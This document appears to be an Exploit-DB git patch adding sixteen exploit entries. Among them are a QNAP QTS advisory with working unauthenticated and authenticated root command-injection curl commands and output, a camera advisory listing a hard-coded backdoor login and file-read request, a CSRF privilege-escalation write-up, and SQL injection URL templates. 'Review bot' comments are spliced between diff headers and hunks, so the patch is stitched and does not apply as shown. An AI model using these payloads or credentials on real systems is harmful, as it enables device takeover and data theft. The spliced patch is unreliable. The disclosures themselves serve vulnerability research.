From ddb02a2ec644982e351910fba86f828ff1e47bd0 Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Sat, 8 Apr 2017 05:01:18 +0000
Subject: [PATCH] DB: 2017-04-08
16 new exploits
Aztek Forum 4.00 - 'myadmin.php' User Privilege Escalation
Aztek Forum 4.0 - 'myadmin.php' User Privilege Escalation
Intellinet NFC-30IR Camera - Multiple Vulnerabilities
Faveo Helpdesk Community 1.9.3 - Cross-Site Request Forgery
Invoice Template - 'hash' Parameter SQL Injection
Document Management Template - 'hash' Parameter SQL Injection
Shopping Cart Template - 'item' Parameter SQL Injection
Calendar Template 2.0 - 'editid1' Parameter SQL Injection
Forum Template 1.0 - SQL Injection
Quiz Template 1.0 - 'testid' Parameter SQL Injection
Survey Template 1.1 - 'masterkey1' Parameter SQL Injection
My Gaming Ladder Combo System 7.5 - SQL Injection
Ladder System 6.0 - 'faqid' Parameter SQL Injection
WordPress Plugin Firewall 2 1.3 - Cross-Site Request Forgery / Cross-Site Scripting
QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection
e107 CMS 2.1.4 - Cross-Site Request Forgery
WordPress Plugin WHIZZ < 1.1.1 - Cross-Site Request Forgery
WordPress Plugin CopySafe Web Protect < 2.6 - Cross-Site Request Forgery
---
files.csv | 18 ++-
platforms/cgi/webapps/41842.txt | 197 +++++++++++++++++++++++++++
platforms/hardware/webapps/41829.txt | 118 ++++++++++++++++
platforms/php/webapps/41830.txt | 60 ++++++++
platforms/php/webapps/41831.txt | 18 +++
platforms/php/webapps/41832.txt | 20 +++
platforms/php/webapps/41833.txt | 18 +++
platforms/php/webapps/41834.txt | 18 +++
platforms/php/webapps/41835.txt | 19 +++
platforms/php/webapps/41836.txt | 18 +++
platforms/php/webapps/41837.txt | 19 +++
platforms/php/webapps/41838.txt | 27 ++++
platforms/php/webapps/41839.txt | 25 ++++
platforms/php/webapps/41841.html | 58 ++++++++
platforms/php/webapps/41844.html | 51 +++++++
platforms/php/webapps/41845.txt | 34 +++++
platforms/php/webapps/41846.html | 40 ++++++
17 files changed, 757 insertions(+), 1 deletion(-)
create mode 100755 platforms/cgi/webapps/41842.txt
create mode 100755 platforms/hardware/webapps/41829.txt
create mode 100755 platforms/php/webapps/41830.txt
create mode 100755 platforms/php/webapps/41831.txt
create mode 100755 platforms/php/webapps/41832.txt
create mode 100755 platforms/php/webapps/41833.txt
create mode 100755 platforms/php/webapps/41834.txt
create mode 100755 platforms/php/webapps/41835.txt
create mode 100755 platforms/php/webapps/41836.txt
create mode 100755 platforms/php/webapps/41837.txt
create mode 100755 platforms/php/webapps/41838.txt
create mode 100755 platforms/php/webapps/41839.txt
create mode 100755 platforms/php/webapps/41841.html
create mode 100755 platforms/php/webapps/41844.html
create mode 100755 platforms/php/webapps/41845.txt
create mode 100755 platforms/php/webapps/41846.html
diff --git a/files.csv b/files.csv
index 1ed7e2ed2..1b1ec3195 100644
--- a/files.csv
+++ b/files.csv
@@ -16364,7 +16364,7 @@ id,file,description,date,author,platform,type,port
 1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - 'details_view.php' SQL Injection",2006-03-25,undefined1_,php,webapps,0
 1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0
 1612,platforms/php/webapps/1612.php,"CuteNews 1.4.1 - 'function.php' Local File Inclusion",2006-03-26,"Hamid Ebadi",php,webapps,0
-1616,platforms/php/webapps/1616.pl,"Aztek Forum 4.00 - 'myadmin.php' User Privilege Escalation",2006-03-26,Sparah,php,webapps,0
+1616,platforms/php/webapps/1616.pl,"Aztek Forum 4.0 - 'myadmin.php' User Privilege Escalation",2006-03-26,Sparah,php,webapps,0
 1617,platforms/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - 'sendpassword.php' SQL Injection",2006-03-28,rgod,php,webapps,0
 1618,platforms/php/webapps/1618.c,"GreyMatter WebLog 1.21d - Remote Command Execution (1)",2006-03-28,No_Face_King,php,webapps,0
 1619,platforms/php/webapps/1619.pl,"GreyMatter WebLog 1.21d - Remote Command Execution (2)",2006-03-28,Hessam-x,php,webapps,0
@@ -37701,3 +37701,19 @@ id,file,description,date,author,platform,type,port
 41822,platforms/php/webapps/41822.txt,"GeoMoose < 2.9.2 - Directory Traversal",2017-04-03,"Sander Ferdinand",php,webapps,0
 41828,platforms/php/webapps/41828.php,"Moodle 2.x/3.x - SQL Injection",2017-04-06,"Marko Belzetski",php,webapps,0
 41824,platforms/php/webapps/41824.txt,"HelpDEZK 1.1.1 - Cross-Site Request Forgery / Code Execution",2017-04-05,rungga_reksya,php,webapps,0
+41829,platforms/hardware/webapps/41829.txt,"Intellinet NFC-30IR Camera - Multiple Vulnerabilities",2017-04-07,"Dimitri Fousekis",hardware,webapps,0
+41830,platforms/php/webapps/41830.txt,"Faveo Helpdesk Community 1.9.3 - Cross-Site Request Forgery",2017-04-05,rungga_reksya,php,webapps,0
+41831,platforms/php/webapps/41831.txt,"Invoice Template - 'hash' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41832,platforms/php/webapps/41832.txt,"Document Management Template - 'hash' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41833,platforms/php/webapps/41833.txt,"Shopping Cart Template - 'item' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41834,platforms/php/webapps/41834.txt,"Calendar Template 2.0 - 'editid1' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41835,platforms/php/webapps/41835.txt,"Forum Template 1.0 - SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41836,platforms/php/webapps/41836.txt,"Quiz Template 1.0 - 'testid' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41837,platforms/php/webapps/41837.txt,"Survey Template 1.1 - 'masterkey1' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41838,platforms/php/webapps/41838.txt,"My Gaming Ladder Combo System 7.5 - SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41839,platforms/php/webapps/41839.txt,"Ladder System 6.0 - 'faqid' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41841,platforms/php/webapps/41841.html,"WordPress Plugin Firewall 2 1.3 - Cross-Site Request Forgery / Cross-Site Scripting",2017-04-07,dxw,php,webapps,80
+41842,platforms/cgi/webapps/41842.txt,"QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection",2017-04-07,"Harry Sintonen",cgi,webapps,0
+41844,platforms/php/webapps/41844.html,"e107 CMS 2.1.4 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,0
+41845,platforms/php/webapps/41845.txt,"WordPress Plugin WHIZZ < 1.1.1 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,80
+41846,platforms/php/webapps/41846.html,"WordPress Plugin CopySafe Web Protect < 2.6 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,80
diff --git a/platforms/cgi/webapps/41842.txt b/platforms/cgi/webapps/41842.txt
new file mode 100755
index 000000000..a5deffe53
--- /dev/null
+++ b/platforms/cgi/webapps/41842.txt
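Review bot: The port column is applied inconsistently across the rows added in the second hunk: `41841`, `41845` and `41846` (the WordPress CSRF entries) record 80 while `41844` (e107 CSRF) and every other new web entry record 0, so anyone filtering the index by port gets a partial view of the same class of issue; pick one convention for HTTP-only entries and apply it to all sixteen rows. The `41842` description names only the TVS-663, although the advisory it indexes (41842.txt) also confirms the HS-251+ and states the author believes all QTS devices are affected, so a model-based search understates the scope; a description along the lines of `"QNAP QTS < 4.2.4 build 20170313 - Command Injection (TVS-663 / HS-251+)"` would index the affected product rather than only the test device.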
@@ -0,0 +1,197 @@
+QNAP QTS multiple RCE vulnerabilities
+=====================================
+The latest version of this advisory is available at:
+https://sintonen.fi/advisories/qnap-qts-multiple-rce-vulnerabilities.txt
+
+
+Overview
+--------
+
+QNAP QTS firmware contains multiple Command Injection (CWE-77)
+vulnerabilities that can be exploited to gain remote command execution
+on the devices.
+
+
+Description
+-----------
+
+QNAP QTS web user interface CGI binaries include Command Injection
+(CWE-77) vulnerabilities. An unauthenticated attacker can execute
+arbitrary commands on the targeted device.
+
+
+Impact
+------
+
+The attacker is able to execute arbitrary commands as administrative user
+(root). The attacker has full access to all content on the targeted
+device, and can read, modify or remove content at will.
+
+
+Details
+-------
+
+The discovered vulnerabilities, described in more detail below, enable
+multiple independent attacks described here in brief:
+
+- Unauthenticated Remote Command Execution
+
+ The unauthenticated attacker can perform HTTP requests that exploit
+ the vulnerability to execute arbitrary commands. If the device is
+ connected to the internet, the vulnerable devices can be taken over in
+ an automated fashion and can then be used for further attacks.
+
+- Authenticated Remote Command Execution
+
+ The authenticated attacker can perform HTTP requests that exploit
+ the vulnerabilities to execute arbitrary commands. This gives users
+ that normally have only restricted access to the device full
+ administrative (root) access to the system and access to all data
+ stored on the device regardless of the specified access limitations.
+
+
+Vulnerabilities
+---------------
+
+1. [CVE-2017-6361] Command Injection in authLogin.cgi `reboot_notice_msg' (CWE-77)
+
+/cgi-bin/authLogin.cgi CGI has a command injection bug. The
+following commands are executed via system():
+
+/sbin/vjbod_util -i '%s' 1>>/dev/null 2>&1
+/sbin/vdd_control "%s" %d 2>>/dev/null 2>>/dev/null
+
+The value inserted to %s is obtained from the `reboot_notice_msg' HTTP
+request GET parameter.
+
+The reboot_notice_msg is a base64 encoded message of form:
+
+QNAPVJBDTTTTTTTTCCCCCCCCCCCCCCCCLLLLPAYLOAD
+
+- TTTTTTTT is the unix time stamp (last 8 digits)
+- CCCCCCCCCCCCCCCC is the command to perform (Disconnect)
+- LLLL is the payload length
+- PAYLOAD is the payload contents (LLLL bytes)
+
+By creating a crafted reboot_notice_msg value, arbitrary commands
+can be executed. For example:
+
+QNAPVJBD88150863 Disconnect 14`(echo;id)>&2`
+
+$ curl -ki "https://TARGET/cgi-bin/authLogin.cgi?reboot_notice_msg=$(printf 'QNAPVJBD%08d%16s 14`(echo;id)>&2`' $(expr $(date +%s) % 100000000) Disconnect|base64|tr -d '\r\n')"
+uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
+Content-type: text/xml
+
+
+
+Disconnect
+`(echo;id)>&2`
+
+$
+
+
+2. [CVE-2017-6360] Command Injection in userConfig.cgi cloudPersonalSmtp `hash' (CWE-77)
+
+/cgi-bin/userConfig.cgi CGI has a command injection bug. The following
+command is executed via popen():
+
+/sbin/cloud_util -r %s 2>/dev/null
+
+The value inserted to %s is obtained from the `hash' HTTP request GET
+parameter.
+
+An authenticated user can use a specially crafted hash parameter to execute
+arbitrary commands as root:
+
+$ curl -ki 'https://TARGET/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;uname%20-a)>%262`'
+HTTP/1.1 200 OK
+Date: Sun, 26 Feb 2017 22:55:48 GMT
+Transfer-Encoding: chunked
+Content-Type: text/plain
+
+uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
+Linux TARGET 3.12.6 #1 SMP Mon Feb 13 01:43:01 CST 2017 x86_64 unknown
+Content-type: text/html; charset="UTF-8"
+
+Usage:
+ /sbin/cloud_util -r [enc_token]
+$
+
+
+3. [CVE-2017-6359] Command Injection in utilRequest.cgi cancel_trash_recovery `pid' (CWE-77)
+
+/cgi-bin/filemanager/utilRequest.cgi CGI has a command injection bug. The
+following commands are executed via system():
+
+/bin/kill -9 %s
+
+The value inserted to %s is obtained from the `pid' HTTP request GET
+parameter.
+
+An authenticated user can use a specially crafted pid parameter to execute
+arbitrary commands as root:
+
+$ curl -k 'https://TARGET/cgi-bin/filemanager/utilRequest.cgi?func=cancel_trash_recovery&sid=SIDVALUE&pid=`id>/tmp/pwned`'
+{ "version": "4.2.1", "build": "20170213", "status": 0, "success": "true" }
+
+[~] # cat /tmp/pwned
+uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
+[~] #
+
+
+Vulnerable devices
+------------------
+
+The vulnerabilities were discovered from an QNAP TVS-663, firmware version
+4.2.2 Build 20161214. They're also confirmed to work with version 4.2.3
+Build 20170213.
+
+CVE-2017-6361 was also confirmed on QNAP HS-251+ running QTS 4.2.2 Build
+20161028.
+
+It is believed that these vulnerabilities affect all devices running QTS.
+
+
+Recommendations to vendor
+-------------------------
+
+1. Fix the command injection vulnerabilities by performing proper input
+ validation (whitelisting) and/or shell metacharacter escaping, or by
+ utilizing execl family of functions.
+
+
+End user mitigation
+-------------------
+
+- Install the firmware update version 4.2.4 build 20170313 or later.
+
+OR
+
+- Restrict access to the web user interface (ports 8080 and 443).
+
+
+Credits
+-------
+
+The vulnerabilities were discovered by Harry Sintonen / F-Secure Corporation.
+
+
+Timeline
+--------
+
+21.01.2017 discovered vulnerabilities 2 and 3
+23.02.2017 discovered vulnerability 1
+23.02.2017 reported vulnerability 1 to the vendor
+26.02.2017 started to write a preliminary advisory
+27.02.2017 sent the preliminary advisory to vendor and CERT-FI
+27.02.2017 requested CVE-IDs from MITRE
+28.02.2017 received CVE-IDs from MITRE
+02.03.2017 inquired status from vendor contact
+02.03.2017 vendor confirmed CVE-2017-6361
+04.03.2017 vendor confirmed the other two vulnerabilities
+13.03.2017 vendor communicated about a upcoming release fixing the vulns
+14.03.2017 vendor released QTS 4.2.4 build 20170313 fixing the vulns
+15.03.2017 sent update to CERT-FI
+21.03.2017 vendor released NAS-201703-21 advisory:
+ https://www.qnap.com/en/support/con_show.php?cid=113
+06.04.2017 public release of the advisory
\ No newline at end of file
diff --git a/platforms/hardware/webapps/41829.txt b/platforms/hardware/webapps/41829.txt
new file mode 100755
index 000000000..ce7d22d63
--- /dev/null
+++ b/platforms/hardware/webapps/41829.txt
@@ -0,0 +1,118 @@
+Bitcrack Cyber Security - BitLabs Advisory
+http://www.bitcrack.net
+
+Multiple Vulnerabilities in Intellinet NFC-30IR Network Cameras
+
+
+ADVISORY
+--------
+
+Title: Local File Inclusion in CGI-SCRIPT & Hard-Coded Manufacturer Backdoor
+Advisory ID: BITL-17-001
+Date published: 2017-04-05
+Date of last update: 2017-04-05
+Vendors contacted: Intellinet
+
+VULNERABILITY
+-------------
+
+Type: Local File Inclusion (LFI)(Authenticated) & Hardcoded Manufacturer Backdoor
+Risk/Impact: Access to sensitive files & Access control bypass.
+Exploitation Type : Remote
+CVE Name: CVE-2017-7461 and CVE-2017-7462
+
+DESCRIPTION
+------------
+
+We found two vulnerabilities affecting the Intellinet NFC-30IR Camera with
+firmware version LM.1.6.16.05
+
+ 1. [CVE-2017-7461] once authenticated as admin:admin, you can read local files
+ by requesting the '/cgi-bin/admin/fileread?READ.filePath='
+
+ Instead of the developer using server-side scripts to render information, it takes the
+ plain text files and uses /fileread CGI script to simply return the plain text - the
+ site then relies on Javascript to "format" the text into something pretty.
+
+ There is no sanitization nor lock-down of what paths that script can read, hence all
+ files can be viewed. Interesting files to request are; /etc/passwd; /etc/boa.conf and more.
+
+
+ 2. [CVE-2017-7462] a manufacturer backdoor exists that allows one to access a script
+ called '/cgi-bin/mft/manufacture' by authenticating as manufacture:erutcafunam
+
+ This binary has been analyzed before by other vendors. We did not analyze it again as we
+ feel this is the same file used in other cameras. Note that the NFC-30IR does NOT have the
+ wireless_mft executable.
+
+ The hard-coded manufacturer user:pass is manufacture:erutcafunam as shown in the
+ below boa.conf snippet;
+ /----
+ --snip--
+ #ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
+ ScriptAlias /cgi-bin/operator/ /opt/cgi/operator/
+ ScriptAlias /cgi-bin/view/ /opt/cgi/view/
+ ScriptAlias /cgi-bin/admin/ /opt/cgi/admin/
+ ScriptAlias /cgi-bin/jpg/ /opt/cgi/jpg/
+ ScriptAlias /cgi-bin/ /opt/cgi/
+ ScriptAlias /jpg /opt/cgi/jpg
+
+ # MFT: Specify manufacture commands user name and password
+ MFT manufacture erutcafunam
+
+ --snip--
+ ----/
+
+ This indicates that the camera hardware may be some kind of modified/stripped version
+ of a Zavio board.
+
+VENDOR RESPONSE/NOTIFICATION
+----------------------------
+
+Vendor was given 7 days to respond, and 3 written notifications.
+No response received nor acknowledgement.
+Vendor has not released updates to fix the vulnerabilities.
+
+CREDITS
+-------
+
+Vulnerabilities discovered by Dimitri Fousekis/RuraPenthe
+Additional information on how the manufacture CGI executable works was obtained by
+information written by Core Security/Francisco Falcon.
+
+PROOF OF CONCEPT CODE
+----------------------
+
+LOCAL FILE INCLUSION THROUGH CGI FILE READER
+/-----
+GET /cgi-bin/admin/fileread?READ.filePath=/etc/passwd HTTP/1.1
+Host: 10.0.0.21
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
+Referer: http://10.0.0.21/system_info.htm
+Cookie: VideoFmt=3
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: close
+-----/
+
+ABOUT BITLABS
+-------------
+
+BitLabs is the research division of Bitcrack Cyber Security, a South African & Mauritian
+based cyber security company. We specialize in providing our clients with research and
+information to combat current and future attacks on their systems and devices.
+BitLabs focuses primarily on IoT device research, identifying vulnerabilities and other
+attack vectors that can impact users of these devices negatively.
+Our Web address is at : http://www.bitcrack.net
+
+DISCLAIMER INFO
+---------------
+
+All content of this advisory is Copyright (C) 2017 Bitcrack Cyber Security,
+and are licensed under a Creative Commons Attribution Non-Commercial 3.0
+(South Africa) License: http://za.creativecommons.org/ and other countries as and when
+stipulated.
+
diff --git a/platforms/php/webapps/41830.txt b/platforms/php/webapps/41830.txt
new file mode 100755
index 000000000..e36d7730c
--- /dev/null
+++ b/platforms/php/webapps/41830.txt
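Review bot: The advisory states under VENDOR RESPONSE/NOTIFICATION that no fix has been released, yet it offers operators no mitigation section, unlike the QNAP advisory (41842.txt) added in the same commit, which has an explicit "End user mitigation" heading. Since the file-read issue is described as reachable only after authenticating with the default `admin:admin` credentials, a short MITIGATION section before CREDITS should advise changing the default administrator password and restricting network access to the camera's web interface. The text does not say whether the hard-coded `manufacture` account can be disabled or changed by the operator, so that section should present network restriction as the only control shown here for CVE-2017-7462 until the vendor ships updated firmware.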
@@ -0,0 +1,60 @@
+# Exploit Title: CSRF / Privilege Escalation (Manipulation of Role Agent to Admin) on Faveo version Community 1.9.3
+# Google Dork: no
+# Date: 05-April-2017
+# Exploit Author: @rungga_reksya, @yokoacc, @AdyWikradinata, @dickysofficial, @dvnrcy
+# Vendor Homepage: http://www.faveohelpdesk.com/
+# Software Link: https://codeload.github.com/ladybirdweb/faveo-helpdesk/zip/v1.9.3
+# Version: Community 1.9.3
+# Tested on: Windows Server 2012 Datacenter Evaluation
+# CVSS 3.0: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L (8.3 - HIGH)
+# CVE: 2017-7571
+
+
+I. Background:
+Faveo Helpdesk Open source ticketing system build on Laravel framework. Faveo word is derived from Latin which means to be favourable. Which truly highlights vision and the scope as well as the functionality of the product that Faveo is. It is specifically designed to cater the needs of startups and SME's empowering them with state of art, ticket based support system. In today's competitive startup scenario customer retention is one of the major challenges. Handling client query diligently is all the difference between retaining or losing a long lasting relationship.
+
+II. Description:
+Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
+ +Faveo have role: +- user (Cannot access backend) +- agent (Can access backend but limited) +- admin (Can full access backend) + +III. Exploit: +CSRF target is: “/public/rolechangeadmin/USER_ID” + +e.g: +user id = 11 (role is agent) + +We have low privilege as “agent” to access application, and we want change to be admin role. +- Make sample our script of CSRF (rolechange.html): + + + +   +   
+      +      +      +   
+  + + +- Before running “rolechange.html”, please login your account as agent and running your html script. +- Yeaaah, now user id 11 become admin privilege ^_^ + + +IV. Thanks to: +- Alloh SWT +- MyBoboboy +- Komunitas IT Auditor & IT Security + + +Refer: +https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) +https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003) + +PoC: +https://github.com/ladybirdweb/faveo-helpdesk/issues/446 +http://rungga.blogspot.co.id/2017/04/csrf-privilege-escalation-manipulation.html \ No newline at end of file diff --git a/platforms/php/webapps/41831.txt b/platforms/php/webapps/41831.txt new file mode 100755 index 000000000..865897c83 --- /dev/null +++ b/platforms/php/webapps/41831.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Invoice Template v1.0 for PHPRunner/ASPRunnerPro/ASPRunner.NET. - SQL Injection +# Google Dork: N/A +# Date: 07.04.2017 +# Vendor Homepage: https://xlinesoft.com/ +# Software: https://xlinesoft.com/invoice +# Demo: https://xlinesoft.com/livedemo/invoice/livedemo1/ +# Version: 1.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/invoices_view.php?hash=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41832.txt b/platforms/php/webapps/41832.txt new file mode 100755 index 000000000..a8fd678ba --- /dev/null +++ b/platforms/php/webapps/41832.txt 
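Review bot: The header line `# CVE: 2017-7571` in 41830.txt omits the `CVE-` prefix that the sibling advisory in this commit uses (41829.txt writes `CVE Name: CVE-2017-7461 and CVE-2017-7462`), so a plain identifier search for CVE-2017-7571 will not match this file; write it as `# CVE: CVE-2017-7571`. The Description section is a generic CSRF definition, and the Exploit section names the target route `/public/rolechangeadmin/USER_ID` without stating which protection that state-changing request is missing; one sentence naming the absent check would make the finding verifiable for a reader who has the application in front of them.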
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Document Management Template v1.0 for PHPRunner 8.x,ASPRunnerPro 9.x,ASPRunner.NET 8.x or better.- SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: https://xlinesoft.com/
+# Software: https://xlinesoft.com/docmanager
+# Demo: https://xlinesoft.com/livedemo/docmanager/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/Share_add.php?hash=[SQL]
+# # # # #
+
diff --git a/platforms/php/webapps/41833.txt b/platforms/php/webapps/41833.txt
new file mode 100755
index 000000000..759b3b21b
--- /dev/null
+++ b/platforms/php/webapps/41833.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Shopping Cart Template v1.0 for ASPRunnerPro/PHPRunner. - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: https://xlinesoft.com/
+# Software: https://xlinesoft.com/templates/shoppingcart/index.htm
+# Demo: https://xlinesoft.com/livedemo/shopcart/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/client/shopinventory_list.php?item=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41834.txt b/platforms/php/webapps/41834.txt
new file mode 100755
index 000000000..7ecffa371
--- /dev/null
+++ b/platforms/php/webapps/41834.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Calendar v2.0 for ASPRunnerPro/PHPRunner/ASPRunner.NET. - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: https://xlinesoft.com/
+# Software: https://xlinesoft.com/templates/calendar/index.htm
+# Demo: https://xlinesoft.com/livedemo/calendar/
+# Version: 2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/caldaily_view.php?editid1=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41835.txt b/platforms/php/webapps/41835.txt
new file mode 100755
index 000000000..3cf85809a
--- /dev/null
+++ b/platforms/php/webapps/41835.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Forum Template v1.0 for ASPRunnerPro/PHPRunner/ASPRunner.NET. - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: https://xlinesoft.com/
+# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=9
+# Demo: https://xlinesoft.com/livedemo/forum/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/replies/list?mastertable=topics&masterkey1=[SQL]
+# http://localhost/[PATH]/topics/list?search=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41836.txt b/platforms/php/webapps/41836.txt
new file mode 100755
index 000000000..1e2c9e65e
--- /dev/null
+++ b/platforms/php/webapps/41836.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Quiz Template v1.0 for ASPRunnerPro/PHPRunner. - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: https://xlinesoft.com/
+# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=2
+# Demo: https://xlinesoft.com/livedemo/quiz/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/quiz_responses_add.php?testid=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41837.txt b/platforms/php/webapps/41837.txt
new file mode 100755
index 000000000..bd64f49fb
--- /dev/null
+++ b/platforms/php/webapps/41837.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Survey Template v1.1 for ASPRunnerPro,PHPRunner. - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: https://xlinesoft.com/
+# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=3
+# Demo: https://xlinesoft.com/livedemo/survey/
+# Version: 1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/svv_questions_list.php?mastertable=svv_surveys&masterkey1=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41838.txt b/platforms/php/webapps/41838.txt
new file mode 100755
index 000000000..29fb59b9a
--- /dev/null
+++ b/platforms/php/webapps/41838.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: My Gaming Ladder Combo System 7.5 - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: http://www.mygamingladder.com/
+# Software: http://www.mygamingladder.com/demos.shtml
+# Demo: http://www.mygamingladder.com/upgrade/combo/
+# Version: 7.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/game.php?gameid=[SQL]
+# http://localhost/[PATH]/news.php?newsid=[SQL]
+# http://localhost/[PATH]/teams.php?teamid=[SQL]
+# http://localhost/[PATH]/match.php?matchid=[SQL]
+# staff
+# staffaccess
+# staffcomments
+# teammembers
+# teammembersinv
+# teams
+# # # # #
diff --git a/platforms/php/webapps/41839.txt b/platforms/php/webapps/41839.txt
new file mode 100755
index 000000000..10df5b6a5
--- /dev/null
+++ b/platforms/php/webapps/41839.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: My Gaming Ladder System 6.0 - SQL Injection
+# Google Dork: N/A
+# Date: 07.04.2017
+# Vendor Homepage: http://www.mygamingladder.com/
+# Software: http://www.mygamingladder.com/ladder.shtml
+# Demo: http://www.ladder.tf2.co.za/
+# Version: 6.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/news.php?faqid=[SQL]
+# staff :id
+# staff :displayname
+# staff :pass
+# staff :email
+# staff :title
+# staff :access
+# staff :contact
+# # # # #
diff --git a/platforms/php/webapps/41841.html b/platforms/php/webapps/41841.html
new file mode 100755
index 000000000..9b1f86e21
--- /dev/null
+++ b/platforms/php/webapps/41841.html
@@ -0,0 +1,58 @@
+
